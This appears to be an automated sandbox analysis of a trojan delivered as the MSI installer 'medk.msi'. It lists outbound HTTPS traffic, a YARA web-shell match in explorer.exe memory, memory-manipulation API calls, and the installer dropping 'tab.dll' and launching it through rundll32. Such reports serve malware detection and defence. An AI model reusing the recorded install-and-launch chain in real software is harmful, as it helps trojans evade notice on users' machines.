            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
            Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
            Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
            Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
            Source: unknownHTTPS traffic detected: 104.21.92.105:443 -> 192.168.2.6:49988 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.15.162:443 -> 192.168.2.6:49989 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.15.162:443 -> 192.168.2.6:50001 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.92.105:443 -> 192.168.2.6:50026 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.92.105:443 -> 192.168.2.6:50077 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
            Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
            Source: C:\Windows\System32\rundll32.exeCode function: 6_3_00000293134ED279 NtAllocateVirtualMemory,6_3_00000293134ED279
            Source: C:\Windows\System32\rundll32.exeCode function: 6_3_00000293134ED2E9 NtProtectVirtualMemory,6_3_00000293134ED2E9
            Source: C:\Windows\explorer.exeCode function: 8_2_02E082B4 NtFreeVirtualMemory,8_2_02E082B4
            Source: C:\Windows\explorer.exeCode function: 8_2_02E0B388 NtAllocateVirtualMemory,8_2_02E0B388
            Source: C:\Windows\explorer.exeCode function: 8_2_02E0C704 NtDelayExecution,8_2_02E0C704
            Source: C:\Windows\explorer.exeCode function: 8_2_02E080B8 RtlInitUnicodeString,NtCreateFile,8_2_02E080B8
            Source: C:\Windows\explorer.exeCode function: 8_2_02E08240 NtClose,8_2_02E08240
            Source: C:\Windows\explorer.exeCode function: 8_2_02E081C8 NtWriteFile,8_2_02E081C8
            Source: C:\Windows\explorer.exeCode function: 8_2_02E101A0 NtFreeVirtualMemory,CreateMutexExW,8_2_02E101A0
            Source: C:\Windows\explorer.exeCode function: 8_2_02E10130 NtAllocateVirtualMemory,8_2_02E10130
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6d8c4f.msiJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8D3A.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8D89.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8DD8.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8E17.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{5AB6B0C5-5CD6-4CF7-ABF4-4E467A0D78CE}Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8E67.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8F42.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI8D3A.tmpJump to behavior
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_002F6A504_2_002F6A50
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_0032F0324_2_0032F032
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_0031E2704_2_0031E270
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_003292A94_2_003292A9
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_0031C2CA4_2_0031C2CA
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_003284BD4_2_003284BD
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_0031A5874_2_0031A587
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_002FC8704_2_002FC870
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_0032D8D54_2_0032D8D5
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_003149204_2_00314920
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_0031A9154_2_0031A915
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_00320A484_2_00320A48
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_002F9CC04_2_002F9CC0
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_00325D6D4_2_00325D6D
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000EC306_2_000000018000EC30
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800F2C346_2_00000001800F2C34
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800E1D206_2_00000001800E1D20
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800E317C6_2_00000001800E317C
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800E358C6_2_00000001800E358C
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800E399C6_2_00000001800E399C
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800DB5E86_2_00000001800DB5E8
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800E56386_2_00000001800E5638
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800E464C6_2_00000001800E464C
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018005A2706_2_000000018005A270
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800F32B46_2_00000001800F32B4
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800596E06_2_00000001800596E0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800036F06_2_00000001800036F0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800FB3186_2_00000001800FB318
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000B7406_2_000000018000B740
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800F27A06_2_00000001800F27A0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800F0F9C6_2_00000001800F0F9C
            Source: C:\Windows\explorer.exeCode function: 8_2_02E01A8C8_2_02E01A8C
            Source: C:\Windows\explorer.exeCode function: 8_2_02E01A7C8_2_02E01A7C
            Source: C:\Windows\explorer.exeCode function: 8_2_02E021648_2_02E02164
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: String function: 00313292 appears 70 times
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: String function: 0031325F appears 103 times
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: String function: 00313790 appears 39 times
            Source: medk.msiBinary or memory string: OriginalFilenameviewer.exeF vs medk.msi
            Source: medk.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs medk.msi
            Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
            Source: tab.dll.2.drBinary string: \BaseNamedObjects\NODCOMM%08XTo%08XCommPortAlpcNOD_SHEVT_%s%xSession\%u\NOD_SHMEM_%s%x\\\Device\\\.\MountPointManager\Device\LanmanRedirector\;%c:SystemRootMup\LanmanRedirector\NwRdr\NetWareRedirector\;LanmanRedirector\SystemHarddiskVolume%d%c:HarddiskDmVolumesS-%lu-0x%02hx%02hx%02hx%02hx%02hx%02hx%lu-%lu\NODSTSIBM037IBM437IBM500ASMO-708DOS-720ibm737ibm775ibm850ibm852IBM855ibm857IBM00858IBM860ibm861DOS-862IBM862IBM863IBM864IBM865cp866IBM866ibm869IBM870windows-874TIS-620cp875shift_jisshift-jisgb2312gb_2312-80gbkwindows-936ks_c_5601-1987EUC-KRbig5x-x-big5IBM1026IBM01047IBM01140IBM01141IBM01142IBM01143IBM01144IBM01145IBM01146IBM01147IBM01148IBM01149utf-16unicodeFFFEwindows-1250windows-1251windows-1252windows-1253windows-1254windows-1255windows-1256windows-1257windows-1258Johabmacintoshx-mac-japanesex-mac-chinesetradx-mac-koreanx-mac-arabicx-mac-hebrewx-mac-greekx-mac-cyrillicx-mac-chinesesimpx-mac-romanianx-mac-ukrainianx-mac-thaix-mac-cex-mac-icelandicx-mac-turkishx-mac-croatianutf-32utf-32BEx-Chinese_CNSx-cp20001x_Chinese-Etenx-cp20003x-cp20004x-cp20005x-IA5x-IA5-Germanx-IA5-Swedishx-IA5-Norwegianus-asciix-cp20261x-cp20269IBM273IBM277IBM278IBM280IBM284IBM285IBM290IBM297IBM420IBM423IBM424x-EBCDIC-KoreanExtendedIBM-Thaikoi8-rIBM871IBM880IBM905IBM00924EUC-JPx-cp20936x-cp20949cp1025koi8-uiso-8859-1iso-8859-2iso-8859-3iso-8859-4iso-8859-5iso-8859-6iso-8859-7iso-8859-8iso-8859-9iso-8859-13iso-8859-15x-Europaiso-8859-8-iiso-2022-jpcsISO2022JPiso-2022-krx-cp50227euc-jpEUC-CNeuc-krhz-gb-2312GB18030x-iscii-dex-iscii-bex-iscii-tax-iscii-tex-iscii-asx-iscii-orx-iscii-kax-iscii-max-iscii-gux-iscii-pautf-7utf-8%
            Source: classification engineClassification label: mal100.troj.evad.winMSI@9/24@4/4
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_002F3860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,4_2_002F3860
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_002F4BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,IUnknown_QueryInterface_Proxy,IUnknown_QueryInterface_Proxy,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,4_2_002F4BA0
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_002F45B0 LoadResource,LockResource,SizeofResource,4_2_002F45B0
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CML8E91.tmpJump to behavior
            Source: C:\Windows\System32\rundll32.exeMutant created: NULL
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF4DA8C45DC3BE49B0.TMPJump to behavior
            Source: C:\Windows\Installer\MSI8F42.tmpKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\tab.dll, Object
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.drBinary or memory string: UPDATE MsgPrefix SET JustCreatedFlag = 0 WHERE MsgPrefixID = ?;
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.drBinary or memory string: INSERT INTO CacheDbInfo(DbVersion, UsingAdditionalSemiUniqueID, LastMaintenanceTimestamp) VALUES(?, ?, ?);
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.drBinary or memory string: CREATE TABLE MsgCache(MsgRowid INTEGER PRIMARY KEY, MsgPrefixID INTEGER, MsgID BLOB NOT NULL, LastUsedTimestamp INTEGER, RecordFlags INTEGER, AVData BLOB, ASData BLOB);
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.drBinary or memory string: SELECT MsgRowid, AVData, ASData, LastUsedTimestamp, RecordFlags FROM MsgCache WHERE MsgID = ? AND MsgPrefixID = ?;
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.drBinary or memory string: SELECT MsgRowid, AVData, ASData, LastUsedTimestamp, RecordFlags, AdditionalSemiUniqueID FROM MsgCache WHERE MsgID = ? AND MsgPrefixID = ?;
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.drBinary or memory string: INSERT INTO TempDb.MsgPrefixRowsToDelete SELECT MsgPrefixID FROM MsgPrefix WHERE MsgPrefixID NOT IN (SELECT DISTINCT MsgPrefixID FROM MsgCache) AND (JustCreatedFlag = 0 OR JustCreatedFlag < ? OR JustCreatedFlag > ?);
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.drBinary or memory string: CREATE TABLE MsgPrefix(MsgPrefixID INTEGER PRIMARY KEY, MsgPrefixData BLOB NOT NULL, JustCreatedFlag INTEGER);
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.drBinary or memory string: CREATE TABLE TempDb.MsgPrefixRowsToDelete(MsgPrefixID INTEGER PRIMARY KEY);
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.drBinary or memory string: CREATE TABLE MsgCache(MsgRowid INTEGER PRIMARY KEY, MsgPrefixID INTEGER, MsgID BLOB, LastUsedTimestamp INTEGER, RecordFlags INTEGER, AVData BLOB, ASData BLOB, AdditionalSemiUniqueID BLOB NOT NULL);
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.drBinary or memory string: CREATE TABLE CacheDbInfo(DbVersion INTEGER, UsingAdditionalSemiUniqueID INTEGER, LastMaintenanceTimestamp INTEGER);
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.drBinary or memory string: SELECT DbVersion, UsingAdditionalSemiUniqueID, LastMaintenanceTimestamp FROM CacheDbInfo LIMIT 1;
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.drBinary or memory string: INSERT INTO TempDb.MsgCacheRowsToDelete SELECT MsgRowid FROM MsgCache WHERE LastUsedTimestamp < ? OR LastUsedTimestamp > ? OR MsgPrefixID NOT IN (SELECT MsgPrefixID FROM MsgPrefix);
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.drBinary or memory string: SELECT MsgPrefixID FROM MsgPrefix WHERE MsgPrefixData = ? LIMIT 1;
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.drBinary or memory string: SELECT MsgRowid, AVData, ASData, LastUsedTimestamp, RecordFlags, AdditionalSemiUniqueID FROM MsgCache WHERE MsgRowid = ?;
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.drBinary or memory string: CREATE TABLE TempDb.MsgCacheRowsToDelete(MsgRowid INTEGER PRIMARY KEY);
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.drBinary or memory string: INSERT INTO MsgPrefix(MsgPrefixData, JustCreatedFlag) VALUES (?, ?);
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\medk.msi"
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 31D436F1086AC158C6FA541C36CED057
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI8F42.tmp "C:\Windows\Installer\MSI8F42.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\tab.dll, Object
            Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\tab.dll, Object
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\tab.dll, Object
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 31D436F1086AC158C6FA541C36CED057Jump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI8F42.tmp "C:\Windows\Installer\MSI8F42.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\tab.dll, ObjectJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\tab.dll, ObjectJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\Installer\MSI8F42.tmpSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Installer\MSI8F42.tmpSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Installer\MSI8F42.tmpSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\Installer\MSI8F42.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\Installer\MSI8F42.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\Installer\MSI8F42.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: medk.msiStatic file information: File size 2131456 > 1048576
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI8F42.tmp, 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp, MSI8F42.tmp, 00000004.00000000.2131539788.0000000000337000.00000002.00000001.01000000.00000003.sdmp, medk.msi, MSI8F42.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr
            Source: Binary string: eplgOutlook.pdb source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: medk.msi, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.dr
